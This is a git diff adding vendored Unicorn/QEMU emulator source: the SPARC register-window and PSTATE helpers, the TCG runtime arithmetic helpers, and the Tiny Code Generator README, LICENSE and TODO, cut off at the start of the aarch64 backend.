a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/win_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/win_helper.c new file mode 100644 index 0000000..f077273 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/win_helper.c @@ -0,0 +1,392 @@ +/* + * Helpers for CWP and PSTATE handling + * + * Copyright (c) 2003-2005 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. 
+ * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "exec/helper-proto.h" + +static inline void memcpy32(target_ulong *dst, const target_ulong *src) +{ + dst[0] = src[0]; + dst[1] = src[1]; + dst[2] = src[2]; + dst[3] = src[3]; + dst[4] = src[4]; + dst[5] = src[5]; + dst[6] = src[6]; + dst[7] = src[7]; +} + +void cpu_set_cwp(CPUSPARCState *env, int new_cwp) +{ + /* put the modified wrap registers at their proper location */ + if (env->cwp == env->nwindows - 1) { + memcpy32(env->regbase, env->regbase + env->nwindows * 16); + } + env->cwp = new_cwp; + + /* put the wrap registers at their temporary location */ + if (new_cwp == env->nwindows - 1) { + memcpy32(env->regbase + env->nwindows * 16, env->regbase); + } + env->regwptr = env->regbase + (new_cwp * 16); +} + +target_ulong cpu_get_psr(CPUSPARCState *env) +{ + helper_compute_psr(env); + +#if !defined(TARGET_SPARC64) + return env->version | (env->psr & PSR_ICC) | + (env->psref ? PSR_EF : 0) | + (env->psrpil << 8) | + (env->psrs ? PSR_S : 0) | + (env->psrps ? PSR_PS : 0) | + (env->psret ? PSR_ET : 0) | env->cwp; +#else + return env->psr & PSR_ICC; +#endif +} + +void cpu_put_psr(CPUSPARCState *env, target_ulong val) +{ + env->psr = val & PSR_ICC; +#if !defined(TARGET_SPARC64) + env->psref = (val & PSR_EF) ? 1 : 0; + env->psrpil = (val & PSR_PIL) >> 8; +#endif +#if ((!defined(TARGET_SPARC64)) && !defined(CONFIG_USER_ONLY)) + //cpu_check_irqs(env); +#endif +#if !defined(TARGET_SPARC64) + env->psrs = (val & PSR_S) ? 1 : 0; + env->psrps = (val & PSR_PS) ? 1 : 0; + env->psret = (val & PSR_ET) ? 
1 : 0; + cpu_set_cwp(env, val & PSR_CWP); +#endif + env->cc_op = CC_OP_FLAGS; +} + +int cpu_cwp_inc(CPUSPARCState *env, int cwp) +{ + if (unlikely(cwp >= env->nwindows)) { + cwp -= env->nwindows; + } + return cwp; +} + +int cpu_cwp_dec(CPUSPARCState *env, int cwp) +{ + if (unlikely(cwp < 0)) { + cwp += env->nwindows; + } + return cwp; +} + +#ifndef TARGET_SPARC64 +void helper_rett(CPUSPARCState *env) +{ + unsigned int cwp; + + if (env->psret == 1) { + helper_raise_exception(env, TT_ILL_INSN); + } + + env->psret = 1; + cwp = cpu_cwp_inc(env, env->cwp + 1) ; + if (env->wim & (1 << cwp)) { + helper_raise_exception(env, TT_WIN_UNF); + } + cpu_set_cwp(env, cwp); + env->psrs = env->psrps; +} + +/* XXX: use another pointer for %iN registers to avoid slow wrapping + handling ? */ +void helper_save(CPUSPARCState *env) +{ + uint32_t cwp; + + cwp = cpu_cwp_dec(env, env->cwp - 1); + if (env->wim & (1 << cwp)) { + helper_raise_exception(env, TT_WIN_OVF); + } + cpu_set_cwp(env, cwp); +} + +void helper_restore(CPUSPARCState *env) +{ + uint32_t cwp; + + cwp = cpu_cwp_inc(env, env->cwp + 1); + if (env->wim & (1 << cwp)) { + helper_raise_exception(env, TT_WIN_UNF); + } + cpu_set_cwp(env, cwp); +} + +void helper_wrpsr(CPUSPARCState *env, target_ulong new_psr) +{ + if ((new_psr & PSR_CWP) >= env->nwindows) { + helper_raise_exception(env, TT_ILL_INSN); + } else { + cpu_put_psr(env, new_psr); + } +} + +target_ulong helper_rdpsr(CPUSPARCState *env) +{ + return cpu_get_psr(env); +} + +#else +/* XXX: use another pointer for %iN registers to avoid slow wrapping + handling ? */ +void helper_save(CPUSPARCState *env) +{ + uint32_t cwp; + + cwp = cpu_cwp_dec(env, env->cwp - 1); + if (env->cansave == 0) { + helper_raise_exception(env, TT_SPILL | (env->otherwin != 0 ? 
+ (TT_WOTHER | + ((env->wstate & 0x38) >> 1)) : + ((env->wstate & 0x7) << 2))); + } else { + if (env->cleanwin - env->canrestore == 0) { + /* XXX Clean windows without trap */ + helper_raise_exception(env, TT_CLRWIN); + } else { + env->cansave--; + env->canrestore++; + cpu_set_cwp(env, cwp); + } + } +} + +void helper_restore(CPUSPARCState *env) +{ + uint32_t cwp; + + cwp = cpu_cwp_inc(env, env->cwp + 1); + if (env->canrestore == 0) { + helper_raise_exception(env, TT_FILL | (env->otherwin != 0 ? + (TT_WOTHER | + ((env->wstate & 0x38) >> 1)) : + ((env->wstate & 0x7) << 2))); + } else { + env->cansave++; + env->canrestore--; + cpu_set_cwp(env, cwp); + } +} + +void helper_flushw(CPUSPARCState *env) +{ + if (env->cansave != env->nwindows - 2) { + helper_raise_exception(env, TT_SPILL | (env->otherwin != 0 ? + (TT_WOTHER | + ((env->wstate & 0x38) >> 1)) : + ((env->wstate & 0x7) << 2))); + } +} + +void helper_saved(CPUSPARCState *env) +{ + env->cansave++; + if (env->otherwin == 0) { + env->canrestore--; + } else { + env->otherwin--; + } +} + +void helper_restored(CPUSPARCState *env) +{ + env->canrestore++; + if (env->cleanwin < env->nwindows - 1) { + env->cleanwin++; + } + if (env->otherwin == 0) { + env->cansave--; + } else { + env->otherwin--; + } +} + +target_ulong cpu_get_ccr(CPUSPARCState *env) +{ + target_ulong psr; + + psr = cpu_get_psr(env); + + return ((env->xcc >> 20) << 4) | ((psr & PSR_ICC) >> 20); +} + +void cpu_put_ccr(CPUSPARCState *env, target_ulong val) +{ + env->xcc = (val >> 4) << 20; + env->psr = (val & 0xf) << 20; + CC_OP = CC_OP_FLAGS; +} + +target_ulong cpu_get_cwp64(CPUSPARCState *env) +{ + return env->nwindows - 1 - env->cwp; +} + +void cpu_put_cwp64(CPUSPARCState *env, int cwp) +{ + if (unlikely(cwp >= env->nwindows || cwp < 0)) { + cwp %= env->nwindows; + } + cpu_set_cwp(env, env->nwindows - 1 - cwp); +} + +target_ulong helper_rdccr(CPUSPARCState *env) +{ + return cpu_get_ccr(env); +} + +void helper_wrccr(CPUSPARCState *env, target_ulong new_ccr) 
+{ + cpu_put_ccr(env, new_ccr); +} + +/* CWP handling is reversed in V9, but we still use the V8 register + order. */ +target_ulong helper_rdcwp(CPUSPARCState *env) +{ + return cpu_get_cwp64(env); +} + +void helper_wrcwp(CPUSPARCState *env, target_ulong new_cwp) +{ + cpu_put_cwp64(env, new_cwp); +} + +static inline uint64_t *get_gregset(CPUSPARCState *env, uint32_t pstate) +{ + switch (pstate) { + default: + //trace_win_helper_gregset_error(pstate); + /* pass through to normal set of global registers */ + case 0: + return env->bgregs; + case PS_AG: + return env->agregs; + case PS_MG: + return env->mgregs; + case PS_IG: + return env->igregs; + } +} + +void cpu_change_pstate(CPUSPARCState *env, uint32_t new_pstate) +{ + uint32_t pstate_regs, new_pstate_regs; + uint64_t *src, *dst; + + if (env->def->features & CPU_FEATURE_GL) { + /* PS_AG is not implemented in this case */ + new_pstate &= ~PS_AG; + } + + pstate_regs = env->pstate & 0xc01; + new_pstate_regs = new_pstate & 0xc01; + + if (new_pstate_regs != pstate_regs) { + //trace_win_helper_switch_pstate(pstate_regs, new_pstate_regs); + + /* Switch global register bank */ + src = get_gregset(env, new_pstate_regs); + dst = get_gregset(env, pstate_regs); + memcpy32(dst, env->gregs); + memcpy32(env->gregs, src); + } else { + //trace_win_helper_no_switch_pstate(new_pstate_regs); + } + env->pstate = new_pstate; +} + +void helper_wrpstate(CPUSPARCState *env, target_ulong new_state) +{ + cpu_change_pstate(env, new_state & 0xf3f); + +#if !defined(CONFIG_USER_ONLY) + if (cpu_interrupts_enabled(env)) { + // cpu_check_irqs(env); + } +#endif +} + +void helper_wrpil(CPUSPARCState *env, target_ulong new_pil) +{ +#if !defined(CONFIG_USER_ONLY) + //trace_win_helper_wrpil(env->psrpil, (uint32_t)new_pil); + + env->psrpil = new_pil; + + if (cpu_interrupts_enabled(env)) { + // cpu_check_irqs(env); + } +#endif +} + +void helper_done(CPUSPARCState *env) +{ + trap_state *tsptr = cpu_tsptr(env); + + env->pc = tsptr->tnpc; + env->npc = 
tsptr->tnpc + 4; + cpu_put_ccr(env, tsptr->tstate >> 32); + env->asi = (tsptr->tstate >> 24) & 0xff; + cpu_change_pstate(env, (tsptr->tstate >> 8) & 0xf3f); + cpu_put_cwp64(env, tsptr->tstate & 0xff); + env->tl--; + + //trace_win_helper_done(env->tl); + +#if !defined(CONFIG_USER_ONLY) + if (cpu_interrupts_enabled(env)) { + // cpu_check_irqs(env); + } +#endif +} + +void helper_retry(CPUSPARCState *env) +{ + trap_state *tsptr = cpu_tsptr(env); + + env->pc = tsptr->tpc; + env->npc = tsptr->tnpc; + cpu_put_ccr(env, tsptr->tstate >> 32); + env->asi = (tsptr->tstate >> 24) & 0xff; + cpu_change_pstate(env, (tsptr->tstate >> 8) & 0xf3f); + cpu_put_cwp64(env, tsptr->tstate & 0xff); + env->tl--; + + //trace_win_helper_retry(env->tl); + +#if !defined(CONFIG_USER_ONLY) + if (cpu_interrupts_enabled(env)) { + // cpu_check_irqs(env); + } +#endif +} +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg-runtime.c b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg-runtime.c new file mode 100644 index 0000000..21b022a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg-runtime.c @@ -0,0 +1,109 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. 
+ * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ +#include "unicorn/platform.h" +#include "qemu/host-utils.h" + +/* This file is compiled once, and thus we can't include the standard + "exec/helper-proto.h", which has includes that are target specific. */ + +#include "exec/helper-head.h" + +#define DEF_HELPER_FLAGS_2(name, flags, ret, t1, t2) \ + dh_ctype(ret) HELPER(name) (dh_ctype(t1), dh_ctype(t2)); + +#include "tcg-runtime.h" + + +/* 32-bit helpers */ + +int32_t HELPER(div_i32)(int32_t arg1, int32_t arg2) +{ + return arg1 / arg2; +} + +int32_t HELPER(rem_i32)(int32_t arg1, int32_t arg2) +{ + return arg1 % arg2; +} + +uint32_t HELPER(divu_i32)(uint32_t arg1, uint32_t arg2) +{ + return arg1 / arg2; +} + +uint32_t HELPER(remu_i32)(uint32_t arg1, uint32_t arg2) +{ + return arg1 % arg2; +} + +/* 64-bit helpers */ + +uint64_t HELPER(shl_i64)(uint64_t arg1, uint64_t arg2) +{ + return arg1 << arg2; +} + +uint64_t HELPER(shr_i64)(uint64_t arg1, uint64_t arg2) +{ + return arg1 >> arg2; +} + +int64_t HELPER(sar_i64)(int64_t arg1, int64_t arg2) +{ + return arg1 >> arg2; +} + +int64_t HELPER(div_i64)(int64_t arg1, int64_t arg2) +{ + return arg1 / arg2; +} + +int64_t HELPER(rem_i64)(int64_t arg1, int64_t arg2) +{ + return arg1 % arg2; +} + +uint64_t HELPER(divu_i64)(uint64_t arg1, uint64_t arg2) +{ + return arg1 / arg2; +} + +uint64_t HELPER(remu_i64)(uint64_t arg1, uint64_t arg2) +{ + return arg1 % arg2; +} + +uint64_t HELPER(muluh_i64)(uint64_t arg1, uint64_t arg2) +{ + uint64_t l, h; + mulu64(&l, &h, arg1, arg2); + return h; +} + 
+int64_t HELPER(mulsh_i64)(int64_t arg1, int64_t arg2) +{ + uint64_t l, h; + muls64(&l, &h, arg1, arg2); + return h; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/LICENSE b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/LICENSE new file mode 100644 index 0000000..be817fa --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/LICENSE @@ -0,0 +1,3 @@ +All the files in this directory and subdirectories are released under +a BSD like license (see header in each file). No other license is +accepted. diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/README b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/README new file mode 100644 index 0000000..a550ff1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/README @@ -0,0 +1,551 @@ +Tiny Code Generator - Fabrice Bellard. + +1) Introduction + +TCG (Tiny Code Generator) began as a generic backend for a C +compiler. It was simplified to be used in QEMU. It also has its roots +in the QOP code generator written by Paul Brook. + +2) Definitions + +The TCG "target" is the architecture for which we generate the +code. It is of course not the same as the "target" of QEMU which is +the emulated architecture. As TCG started as a generic C backend used +for cross compiling, it is assumed that the TCG target is different +from the host, although it is never the case for QEMU. + +In this document, we use "guest" to specify what architecture we are +emulating; "target" always means the TCG target, the machine on which +we are running QEMU. + +A TCG "function" corresponds to a QEMU Translated Block (TB). + +A TCG "temporary" is a variable only live in a basic +block. Temporaries are allocated explicitly in each function. + +A TCG "local temporary" is a variable only live in a function. Local +temporaries are allocated explicitly in each function. + +A TCG "global" is a variable which is live in all the functions +(equivalent of a C global variable). 
They are defined before the +functions are defined. A TCG global can be a memory location (e.g. a QEMU +CPU register), a fixed host register (e.g. the QEMU CPU state pointer) +or a memory location which is stored in a register outside QEMU TBs +(not implemented yet). + +A TCG "basic block" corresponds to a list of instructions terminated +by a branch instruction. + +An operation with "undefined behavior" may result in a crash. + +An operation with "unspecified behavior" shall not crash. However, +the result may be one of several possibilities so may be considered +an "undefined result". + +3) Intermediate representation + +3.1) Introduction + +TCG instructions operate on variables which are temporaries, local +temporaries or globals. TCG instructions and variables are strongly +typed. Two types are supported: 32 bit integers and 64 bit +integers. Pointers are defined as an alias to 32 bit or 64 bit +integers depending on the TCG target word size. + +Each instruction has a fixed number of output variable operands, input +variable operands and always constant operands. + +The notable exception is the call instruction which has a variable +number of outputs and inputs. + +In the textual form, output operands usually come first, followed by +input operands, followed by constant operands. The output type is +included in the instruction name. Constants are prefixed with a '$'. + +add_i32 t0, t1, t2 (t0 <- t1 + t2) + +3.2) Assumptions + +* Basic blocks + +- Basic blocks end after branches (e.g. brcond_i32 instruction), + goto_tb and exit_tb instructions. +- Basic blocks start after the end of a previous basic block, or at a + set_label instruction. + +After the end of a basic block, the content of temporaries is +destroyed, but local temporaries and globals are preserved. + +* Floating point types are not supported yet + +* Pointers: depending on the TCG target, pointer size is 32 bit or 64 + bit. The type TCG_TYPE_PTR is an alias to TCG_TYPE_I32 or + TCG_TYPE_I64. 
+ +* Helpers: + +Using the tcg_gen_helper_x_y it is possible to call any function +taking i32, i64 or pointer types. By default, before calling a helper, +all globals are stored at their canonical location and it is assumed +that the function can modify them. By default, the helper is allowed to +modify the CPU state or raise an exception. + +This can be overridden using the following function modifiers: +- TCG_CALL_NO_READ_GLOBALS means that the helper does not read globals, + either directly or via an exception. They will not be saved to their + canonical locations before calling the helper. +- TCG_CALL_NO_WRITE_GLOBALS means that the helper does not modify any globals. + They will only be saved to their canonical location before calling helpers, + but they won't be reloaded afterwards. +- TCG_CALL_NO_SIDE_EFFECTS means that the call to the function is removed if + the return value is not used. + +Note that TCG_CALL_NO_READ_GLOBALS implies TCG_CALL_NO_WRITE_GLOBALS. + +On some TCG targets (e.g. x86), several calling conventions are +supported. + +* Branches: + +Use the instruction 'br' to jump to a label. + +3.3) Code Optimizations + +When generating instructions, you can count on at least the following +optimizations: + +- Single instructions are simplified, e.g. + + and_i32 t0, t0, $0xffffffff + + is suppressed. + +- A liveness analysis is done at the basic block level. The + information is used to suppress moves from a dead variable to + another one. It is also used to remove instructions which compute + dead results. The latter is especially useful for condition code + optimization in QEMU. + + In the following example: + + add_i32 t0, t1, t2 + add_i32 t0, t0, $1 + mov_i32 t0, $1 + + only the last instruction is kept. 
+ +3.4) Instruction Reference + +********* Function call + +* call ptr + +call function 'ptr' (pointer type) + + optional 32 bit or 64 bit return value + optional 32 bit or 64 bit parameters + +********* Jumps/Labels + +* set_label $label + +Define label 'label' at the current program point. + +* br $label + +Jump to label. + +* brcond_i32/i64 t0, t1, cond, label + +Conditional jump if t0 cond t1 is true. cond can be: + TCG_COND_EQ + TCG_COND_NE + TCG_COND_LT /* signed */ + TCG_COND_GE /* signed */ + TCG_COND_LE /* signed */ + TCG_COND_GT /* signed */ + TCG_COND_LTU /* unsigned */ + TCG_COND_GEU /* unsigned */ + TCG_COND_LEU /* unsigned */ + TCG_COND_GTU /* unsigned */ + +********* Arithmetic + +* add_i32/i64 t0, t1, t2 + +t0=t1+t2 + +* sub_i32/i64 t0, t1, t2 + +t0=t1-t2 + +* neg_i32/i64 t0, t1 + +t0=-t1 (two's complement) + +* mul_i32/i64 t0, t1, t2 + +t0=t1*t2 + +* div_i32/i64 t0, t1, t2 + +t0=t1/t2 (signed). Undefined behavior if division by zero or overflow. + +* divu_i32/i64 t0, t1, t2 + +t0=t1/t2 (unsigned). Undefined behavior if division by zero. + +* rem_i32/i64 t0, t1, t2 + +t0=t1%t2 (signed). Undefined behavior if division by zero or overflow. + +* remu_i32/i64 t0, t1, t2 + +t0=t1%t2 (unsigned). Undefined behavior if division by zero. + +********* Logical + +* and_i32/i64 t0, t1, t2 + +t0=t1&t2 + +* or_i32/i64 t0, t1, t2 + +t0=t1|t2 + +* xor_i32/i64 t0, t1, t2 + +t0=t1^t2 + +* not_i32/i64 t0, t1 + +t0=~t1 + +* andc_i32/i64 t0, t1, t2 + +t0=t1&~t2 + +* eqv_i32/i64 t0, t1, t2 + +t0=~(t1^t2), or equivalently, t0=t1^~t2 + +* nand_i32/i64 t0, t1, t2 + +t0=~(t1&t2) + +* nor_i32/i64 t0, t1, t2 + +t0=~(t1|t2) + +* orc_i32/i64 t0, t1, t2 + +t0=t1|~t2 + +********* Shifts/Rotates + +* shl_i32/i64 t0, t1, t2 + +t0=t1 << t2. Unspecified behavior if t2 < 0 or t2 >= 32 (resp 64) + +* shr_i32/i64 t0, t1, t2 + +t0=t1 >> t2 (unsigned). Unspecified behavior if t2 < 0 or t2 >= 32 (resp 64) + +* sar_i32/i64 t0, t1, t2 + +t0=t1 >> t2 (signed). 
Unspecified behavior if t2 < 0 or t2 >= 32 (resp 64) + +* rotl_i32/i64 t0, t1, t2 + +Rotation of t2 bits to the left. +Unspecified behavior if t2 < 0 or t2 >= 32 (resp 64) + +* rotr_i32/i64 t0, t1, t2 + +Rotation of t2 bits to the right. +Unspecified behavior if t2 < 0 or t2 >= 32 (resp 64) + +********* Misc + +* mov_i32/i64 t0, t1 + +t0 = t1 + +Move t1 to t0 (both operands must have the same type). + +* ext8s_i32/i64 t0, t1 +ext8u_i32/i64 t0, t1 +ext16s_i32/i64 t0, t1 +ext16u_i32/i64 t0, t1 +ext32s_i64 t0, t1 +ext32u_i64 t0, t1 + +8, 16 or 32 bit sign/zero extension (both operands must have the same type) + +* bswap16_i32/i64 t0, t1 + +16 bit byte swap on a 32/64 bit value. It assumes that the two/six high order +bytes are set to zero. + +* bswap32_i32/i64 t0, t1 + +32 bit byte swap on a 32/64 bit value. With a 64 bit value, it assumes that +the four high order bytes are set to zero. + +* bswap64_i64 t0, t1 + +64 bit byte swap + +* discard_i32/i64 t0 + +Indicate that the value of t0 won't be used later. It is useful to +force dead code elimination. + +* deposit_i32/i64 dest, t1, t2, pos, len + +Deposit T2 as a bitfield into T1, placing the result in DEST. +The bitfield is described by POS/LEN, which are immediate values: + + LEN - the length of the bitfield + POS - the position of the first bit, counting from the LSB + +For example, pos=8, len=4 indicates a 4-bit field at bit 8. +This operation would be equivalent to + + dest = (t1 & ~0x0f00) | ((t2 << 8) & 0x0f00) + +* trunc_shr_i32 t0, t1, pos + +For 64-bit hosts only, right shift the 64-bit input T1 by POS and +truncate to 32-bit output T0. Depending on the host, this may be +a simple mov/shift, or may require additional canonicalization. + +********* Conditional moves + +* setcond_i32/i64 dest, t1, t2, cond + +dest = (t1 cond t2) + +Set DEST to 1 if (T1 cond T2) is true, otherwise set to 0. + +* movcond_i32/i64 dest, c1, c2, v1, v2, cond + +dest = (c1 cond c2 ? 
v1 : v2) + +Set DEST to V1 if (C1 cond C2) is true, otherwise set to V2. + +********* Type conversions + +* ext_i32_i64 t0, t1 +Convert t1 (32 bit) to t0 (64 bit) and does sign extension + +* extu_i32_i64 t0, t1 +Convert t1 (32 bit) to t0 (64 bit) and does zero extension + +* trunc_i64_i32 t0, t1 +Truncate t1 (64 bit) to t0 (32 bit) + +* concat_i32_i64 t0, t1, t2 +Construct t0 (64-bit) taking the low half from t1 (32 bit) and the high half +from t2 (32 bit). + +* concat32_i64 t0, t1, t2 +Construct t0 (64-bit) taking the low half from t1 (64 bit) and the high half +from t2 (64 bit). + +********* Load/Store + +* ld_i32/i64 t0, t1, offset +ld8s_i32/i64 t0, t1, offset +ld8u_i32/i64 t0, t1, offset +ld16s_i32/i64 t0, t1, offset +ld16u_i32/i64 t0, t1, offset +ld32s_i64 t0, t1, offset +ld32u_i64 t0, t1, offset + +t0 = read(t1 + offset) +Load 8, 16, 32 or 64 bits with or without sign extension from host memory. +offset must be a constant. + +* st_i32/i64 t0, t1, offset +st8_i32/i64 t0, t1, offset +st16_i32/i64 t0, t1, offset +st32_i64 t0, t1, offset + +write(t0, t1 + offset) +Write 8, 16, 32 or 64 bits to host memory. + +All these opcodes assume that the pointed host memory doesn't correspond +to a global. In the latter case the behaviour is unpredictable. + +********* Multiword arithmetic support + +* add2_i32/i64 t0_low, t0_high, t1_low, t1_high, t2_low, t2_high +* sub2_i32/i64 t0_low, t0_high, t1_low, t1_high, t2_low, t2_high + +Similar to add/sub, except that the double-word inputs T1 and T2 are +formed from two single-word arguments, and the double-word output T0 +is returned in two single-word outputs. + +* mulu2_i32/i64 t0_low, t0_high, t1, t2 + +Similar to mul, except two unsigned inputs T1 and T2 yielding the full +double-word product T0. The latter is returned in two single-word outputs. + +* muls2_i32/i64 t0_low, t0_high, t1, t2 + +Similar to mulu2, except the two inputs T1 and T2 are signed. 
+ +********* 64-bit guest on 32-bit host support + +The following opcodes are internal to TCG. Thus they are to be implemented by +32-bit host code generators, but are not to be emitted by guest translators. +They are emitted as needed by inline functions within "tcg-op.h". + +* brcond2_i32 t0_low, t0_high, t1_low, t1_high, cond, label + +Similar to brcond, except that the 64-bit values T0 and T1 +are formed from two 32-bit arguments. + +* setcond2_i32 dest, t1_low, t1_high, t2_low, t2_high, cond + +Similar to setcond, except that the 64-bit values T1 and T2 are +formed from two 32-bit arguments. The result is a 32-bit value. + +********* QEMU specific operations + +* exit_tb t0 + +Exit the current TB and return the value t0 (word type). + +* goto_tb index + +Exit the current TB and jump to the TB index 'index' (constant) if the +current TB was linked to this TB. Otherwise execute the next +instructions. Only indices 0 and 1 are valid and tcg_gen_goto_tb may be issued +at most once with each slot index per TB. + +* qemu_ld_i32/i64 t0, t1, flags, memidx +* qemu_st_i32/i64 t0, t1, flags, memidx + +Load data at the guest address t1 into t0, or store data in t0 at guest +address t1. The _i32/_i64 size applies to the size of the input/output +register t0 only. The address t1 is always sized according to the guest, +and the width of the memory operation is controlled by flags. + +Both t0 and t1 may be split into little-endian ordered pairs of registers +if dealing with 64-bit quantities on a 32-bit host. + +The memidx selects the qemu tlb index to use (e.g. user or kernel access). +The flags are the TCGMemOp bits, selecting the sign, width, and endianness +of the memory access. + +For a 32-bit host, qemu_ld/st_i64 is guaranteed to only be used with a +64-bit memory access specified in flags. + +********* + +Note 1: Some shortcuts are defined when the last operand is known to be +a constant (e.g. addi for add, movi for mov). 
+ +Note 2: When using TCG, the opcodes must never be generated directly +as some of them may not be available as "real" opcodes. Always use the +function tcg_gen_xxx(args). + +4) Backend + +tcg-target.h contains the target specific definitions. tcg-target.c +contains the target specific code. + +4.1) Assumptions + +The target word size (TCG_TARGET_REG_BITS) is expected to be 32 bit or +64 bit. It is expected that the pointer has the same size as the word. + +On a 32 bit target, all 64 bit operations are converted to 32 bits. A +few specific operations must be implemented to allow it (see add2_i32, +sub2_i32, brcond2_i32). + +Floating point operations are not supported in this version. A +previous incarnation of the code generator had full support of them, +but it is better to concentrate on integer operations first. + +On a 64 bit target, no assumption is made in TCG about the storage of +the 32 bit values in 64 bit registers. + +4.2) Constraints + +GCC like constraints are used to define the constraints of every +instruction. Memory constraints are not supported in this +version. Aliases are specified in the input operands as for GCC. + +The same register may be used for both an input and an output, even when +they are not explicitly aliased. If an op expands to multiple target +instructions then care must be taken to avoid clobbering input values. +GCC style "early clobber" outputs are not currently supported. + +A target can define specific register or constant constraints. If an +operation uses a constant input constraint which does not allow all +constants, it must also accept registers in order to have a fallback. + +The movi_i32 and movi_i64 operations must accept any constants. + +The mov_i32 and mov_i64 operations must accept any registers of the +same type. + +The ld/st instructions must accept signed 32 bit constant offsets. It +can be implemented by reserving a specific register to compute the +address if the offset is too big. 
+ +The ld/st instructions must accept any destination (ld) or source (st) +register. + +4.3) Function call assumptions + +- The only supported types for parameters and return value are: 32 and + 64 bit integers and pointer. +- The stack grows downwards. +- The first N parameters are passed in registers. +- The next parameters are passed on the stack by storing them as words. +- Some registers are clobbered during the call. +- The function can return 0 or 1 value in registers. On a 32 bit + target, functions must be able to return 2 values in registers for + 64 bit return type. + +5) Recommended coding rules for best performance + +- Use globals to represent the parts of the QEMU CPU state which are + often modified, e.g. the integer registers and the condition + codes. TCG will be able to use host registers to store them. + +- Avoid globals stored in fixed registers. They must be used only to + store the pointer to the CPU state and possibly to store a pointer + to a register window. + +- Use temporaries. Use local temporaries only when really needed, + e.g. when you need to use a value after a jump. Local temporaries + introduce a performance hit in the current TCG implementation: their + content is saved to memory at end of each basic block. + +- Free temporaries and local temporaries when they are no longer used + (tcg_temp_free). Since tcg_const_x() also creates a temporary, you + should free it after it is used. Freeing temporaries does not yield + a better generated code, but it reduces the memory usage of TCG and + the speed of the translation. + +- Don't hesitate to use helpers for complicated or seldom used guest + instructions. There is little performance advantage in using TCG to + implement guest instructions taking more than about twenty TCG + instructions. 
Note that this rule of thumb is more applicable to + helpers doing complex logic or arithmetic, where the C compiler has + scope to do a good job of optimisation; it is less relevant where + the instruction is mostly doing loads and stores, and in those cases + inline TCG may still be faster for longer sequences. + +- The hard limit on the number of TCG instructions you can generate + per guest instruction is set by MAX_OP_PER_INSTR in exec-all.h -- + you cannot exceed this without risking a buffer overrun. + +- Use the 'discard' instruction if you know that TCG won't be able to + prove that a given global is "dead" at a given program point. The + x86 guest uses it to improve the condition codes optimisation. diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/TODO b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/TODO new file mode 100644 index 0000000..0747847 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/TODO @@ -0,0 +1,14 @@ +- Add new instructions such as: clz, ctz, popcnt. + +- See if it is worth exporting mul2, mulu2, div2, divu2. + +- Support of globals saved in fixed registers between TBs. + +Ideas: + +- Move the slow part of the qemu_ld/st ops after the end of the TB. + +- Change exception syntax to get closer to QOP system (exception + parameters given with a specific instruction). + +- Add float and vector support. diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/aarch64/tcg-target.c b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/aarch64/tcg-target.c new file mode 100644 index 0000000..ce8360f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/aarch64/tcg-target.c @@ -0,0 +1,1814 @@ +/* + * Initial TCG Implementation for aarch64 + * + * Copyright (c) 2013 Huawei Technologies Duesseldorf GmbH + * Written by Claudio Fontana + * + * This work is licensed under the terms of the GNU GPL, version 2 or + * (at your option) any later version. 
